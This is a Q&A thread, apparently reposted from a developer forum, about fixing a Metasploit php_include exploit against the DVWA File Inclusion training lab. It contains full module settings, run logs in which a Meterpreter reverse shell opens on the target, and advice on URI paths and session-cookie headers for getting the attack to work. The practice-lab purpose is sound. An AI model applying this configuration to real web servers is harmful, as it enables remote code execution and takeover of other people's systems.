I'm trying to exploit the dvwa File Inclusion vulnerability. I'm refering to this tutorial: http://www.offensive-security.com/metasploit-unleashed/PHP_Meterpreter
When I run 'exploit', I get the following error: [-] Exploit failed: undefined method `remove_resource' for nil:NilClass
The options I set:
msf exploit(php_include) > show options
Module options (exploit/unix/webapp/php_include):
Name Current Setting Required Description
---- --------------- -------- -----------
HEADERS no Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
PATH / yes The base directory to prepend to the URL to try
PHPRFIDB /home/david/msf/metasploit-framework/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI /dvwa/vulnerabilities/fi/?page=XXpathXX no The URI to request, with the include parameter changed to XXpathXX
POSTDATA no The POST data to send, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST 172.16.246.131 yes The target address
RPORT 80 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (php/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 172.16.246.131 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(php_include) > run
[*] Started bind handler
[*] Using URL: http://0.0.0.0:8080/ORFRTphN
[*] Local IP: http://10.8.0.10:8080/ORFRTphN
[*] PHP include server started.
[-] Exploit failed: undefined method `remove_resource' for nil:NilClass
Thanks for help!
This error also seems to appear when the exploit is successful:
msf exploit(php_include) > exploit
[*] Started reverse handler on 192.168.1.2:443
[*] Using URL: http://192.168.1.2:80/521eNu
[*] PHP include server started.
[*] Sending stage (39848 bytes) to 192.168.1.208
[*] Meterpreter session 1 opened (192.168.1.2:443 -> 192.168.1.208:32887) at 2014-06-01 20:44:15 +0100
[-] Exploit failed: undefined method `remove_resource' for nil:NilClass
meterpreter > getuid
Server username: apache (48)
Make sure that the PATH
and PHPURI
settings are set correctly. You may need them to be as follows:
set PATH /dvwa/vulnerabilities/fi
set PHPURI /?page=XXpathXX
Check with Wireshark that the URL is sent as expected.
Also, it could be that certain outbound ports are blocked, so experiment with different values.
In the specific case of DVWA, you will need to pass the session cookie using the HEADERS
parameter. Get this from your logged in browser session and then set as follows:
set HEADERS cookie=PHPSESSIONID=....
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.